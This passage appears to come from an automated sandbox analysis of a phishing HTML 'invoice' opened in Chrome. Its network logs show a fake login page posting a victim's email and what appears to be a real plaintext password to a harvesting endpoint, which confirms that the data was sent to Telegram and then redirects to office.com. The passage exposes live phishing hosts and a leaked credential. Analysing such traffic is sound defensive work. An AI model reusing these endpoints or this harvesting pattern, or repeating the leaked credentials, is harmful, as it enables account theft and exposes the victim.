                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: PHPSESSID=majrhsnjttj7ab63ae4brvfa50
                                                                                                                                                    2025-01-08 08:53:40 UTC1095INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:40 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Td%2BSZFtdNhtHxLGgXgupJ9upQRoIGLlGyJ1s5ZHznctWW%2BKakZSWHgmVjjq%2F72sy7ftmtnzmNOQfjOEkTDBSm5kldnjjKuuF%2BG7FNlI0DlDgsT6NmmscEi3LKCzuXiyNcO7cgbjIB9eKCWP3qZOHcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf55bff5843ef-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2332&min_rtt=2318&rtt_var=898&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=990&delivery_rate=1199178&cwnd=237&unsent_bytes=0&cid=c08f11e8ebf02aca&ts=429&x=0"
                                                                                                                                                    2025-01-08 08:53:40 UTC41INData Raw: 32 33 0d 0a 49 6e 76 61 6c 69 64 20 65 6d 61 69 6c 20 6f 72 20 70 61 73 73 77 6f 72 64 20 69 73 20 65 6d 70 74 79 2e 0d 0a
                                                                                                                                                    Data Ascii: 23Invalid email or password is empty.
                                                                                                                                                    2025-01-08 08:53:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    23192.168.2.449795172.67.165.1054433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:47 UTC748OUTPOST /app/godag.php HTTP/1.1
                                                                                                                                                    Host: bummings.chiliesdigital.co.za
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 47
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:47 UTC47OUTData Raw: 69 73 61 64 6f 73 61 3d 6d 61 74 74 68 69 65 75 2e 62 69 65 6e 73 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 67 74 61 67 6f 6c 61 73 3d
                                                                                                                                                    Data Ascii: isadosa=matthieu.biens%40rockwool.com&gtagolas=
                                                                                                                                                    2025-01-08 08:53:47 UTC1154INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:47 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Set-Cookie: PHPSESSID=1b7rtgumgi6g53kbop8rjik4r0; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JXrmUkf8K0MnvRiIsHpkeCM7XlJJ1Cqg59sjJsAlPyEKbEoXhIdPCHhW%2FogFonxSjkwIUa3Y5Dd%2BG0Hk9urwP%2Bf4cNm3VEajVHrbvkmIRYx3iAUsFzccMlJjxnoFlU33m5%2FcsL6uYgw8SQ1GeYH0Zw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf589b8fc17a9-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1474&rtt_var=569&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1395&delivery_rate=1893644&cwnd=238&unsent_bytes=0&cid=8150006d6e7e65ef&ts=414&x=0"
                                                                                                                                                    2025-01-08 08:53:47 UTC41INData Raw: 32 33 0d 0a 49 6e 76 61 6c 69 64 20 65 6d 61 69 6c 20 6f 72 20 70 61 73 73 77 6f 72 64 20 69 73 20 65 6d 70 74 79 2e 0d 0a
                                                                                                                                                    Data Ascii: 23Invalid email or password is empty.
                                                                                                                                                    2025-01-08 08:53:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    24192.168.2.449797172.67.165.1054433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:48 UTC412OUTGET /app/godag.php HTTP/1.1
                                                                                                                                                    Host: bummings.chiliesdigital.co.za
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: PHPSESSID=majrhsnjttj7ab63ae4brvfa50
                                                                                                                                                    2025-01-08 08:53:48 UTC1130INHTTP/1.1 302 Found
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:48 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                    Location: https://office.com
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=28fjELYai4oP7cIzIxcZ9WoLhXrU%2FTOFFxRRQt%2BMqNvd%2Bm0oGdyNgraRxomQHdt9g1xFCePp49MZ9NM1PUAA1fsfZLNuXdqiveprQ%2Bbt7BIdtRIfHfj1f10NCtodG7TQFiv3DTwn3dacDy99%2FOhJDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf5922f384368-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2118&min_rtt=2108&rtt_var=812&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=990&delivery_rate=1330902&cwnd=233&unsent_bytes=0&cid=66c87278dffdcad9&ts=414&x=0"
                                                                                                                                                    2025-01-08 08:53:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    25192.168.2.449844172.67.165.1054433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:55 UTC748OUTPOST /app/godag.php HTTP/1.1
                                                                                                                                                    Host: bummings.chiliesdigital.co.za
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 68
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Origin: https://vnondb0nbw.satelitnetkomputer.my.id:8443
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:55 UTC68OUTData Raw: 69 73 61 64 6f 73 61 3d 6d 61 74 74 68 69 65 75 2e 62 69 65 6e 73 25 34 30 72 6f 63 6b 77 6f 6f 6c 2e 63 6f 6d 26 67 74 61 67 6f 6c 61 73 3d 4a 42 32 54 25 32 34 62 6b 4b 6c 2a 66 6c 4a 57 4d 25 37 44 73
                                                                                                                                                    Data Ascii: isadosa=matthieu.biens%40rockwool.com&gtagolas=JB2T%24bkKl*flJWM%7Ds
                                                                                                                                                    2025-01-08 08:53:56 UTC1156INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:56 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Set-Cookie: PHPSESSID=lagdh7smam8h51ggb1cvr7ebn4; path=/
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rOI16jdqMxbRZfahez7%2FuVwOu98FyysXMbYCUXJ%2F4a8GHeAguHe9jDhubu%2FmK5YF4jnh1iGo7fhDkmhBF5GaBtDq7S38CbxqMhVRsXzDirNqH00BaLc8ffZNOJqnNEDAb5i4fzUQbMKBATyNJ%2F%2BV3w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf5c0db93c3ff-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1488&min_rtt=1484&rtt_var=566&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=1416&delivery_rate=1918528&cwnd=246&unsent_bytes=0&cid=0af5f04b1a5f8089&ts=443&x=0"
                                                                                                                                                    2025-01-08 08:53:56 UTC51INData Raw: 32 64 0d 0a 44 61 74 61 20 73 61 76 65 64 20 61 6e 64 20 73 65 6e 74 20 74 6f 20 54 65 6c 65 67 72 61 6d 20 73 75 63 63 65 73 73 66 75 6c 6c 79 21 0d 0a
                                                                                                                                                    Data Ascii: 2dData saved and sent to Telegram successfully!
                                                                                                                                                    2025-01-08 08:53:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    26192.168.2.449856172.67.165.1054433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:57 UTC412OUTGET /app/godag.php HTTP/1.1
                                                                                                                                                    Host: bummings.chiliesdigital.co.za
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: */*
                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    Cookie: PHPSESSID=majrhsnjttj7ab63ae4brvfa50
                                                                                                                                                    2025-01-08 08:53:57 UTC1128INHTTP/1.1 302 Found
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:57 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: POST, OPTIONS
                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                    Location: https://office.com
                                                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9U3fvgNmyk0eaDqMMoki0V%2FQp%2B88EwAvPwCEZRkAiPE4%2FFZDBclLdOc3V1mMOV3UUydtIH4HyVkM2OzbApmv3LOQJ1ryRo92H7CObfdTe2YJdU7BTdW5ik8f6wPjbnR7FwwEd0XcUh%2FgWdFVp2scdw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 8feaf5c9db9b4239-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1586&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2852&recv_bytes=990&delivery_rate=1803582&cwnd=232&unsent_bytes=0&cid=3ad3bbd3ed0ef21c&ts=433&x=0"
                                                                                                                                                    2025-01-08 08:53:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    27192.168.2.44985740.99.150.824433636C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-08 08:53:57 UTC730OUTGET /mail/ HTTP/1.1
                                                                                                                                                    Host: outlook.office.com
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                                                                    Referer: https://vnondb0nbw.satelitnetkomputer.my.id:8443/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2025-01-08 08:53:58 UTC922INHTTP/1.1 417
                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                    request-id: 33e720a4-67f4-26cc-87ff-6a64438e8540
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                    X-PreferredRoutingKeyDiagnostics: 0
                                                                                                                                                    X-CalculatedFETarget: BE1P281CU013.internal.outlook.com
                                                                                                                                                    X-BackEndHttpStatus: 417
                                                                                                                                                    X-CalculatedBETarget: BE1PPF39BB4A911.DEUP281.PROD.OUTLOOK.COM
                                                                                                                                                    X-BackEndHttpStatus: 417
                                                                                                                                                    x-besku: UNKNOWN
                                                                                                                                                    X-RUM-Validated: 1
                                                                                                                                                    X-RUM-NotUpdateQueriedPath: 1
                                                                                                                                                    X-RUM-NotUpdateQueriedDbCopy: 1
                                                                                                                                                    X-Proxy-RoutingCorrectness: 1
                                                                                                                                                    X-Proxy-BackendServerStatus: 417
                                                                                                                                                    X-BEPartition: Clique/CLDEUP281SXF05
                                                                                                                                                    X-FEProxyInfo: FR0P281CA0135.DEUP281.PROD.OUTLOOK.COM
                                                                                                                                                    X-FEEFZInfo: HHN
                                                                                                                                                    MS-CV: pCDnM/RnzCaH/2pkQ46FQA.1.1
                                                                                                                                                    X-FEServer: BE1P281CA0148
                                                                                                                                                    Alt-Svc: h3=":443";ma=2592000,h3-29=":443";ma=2592000
                                                                                                                                                    X-FirstHopCafeEFZ: HHN
                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                    X-FEServer: FR0P281CA0135
                                                                                                                                                    Date: Wed, 08 Jan 2025 08:53:57 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 0


                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:03:52:54
                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Subscription_Renewal_Invoice_2025_HKVXTC.html"
                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:false

                                                                                                                                                    Target ID:2
                                                                                                                                                    Start time:03:52:57
                                                                                                                                                    Start date:08/01/2025
                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2028,i,12400976106869586370,12546143425724789010,262144 /prefetch:8
                                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:false

                                                                                                                                                    No disassembly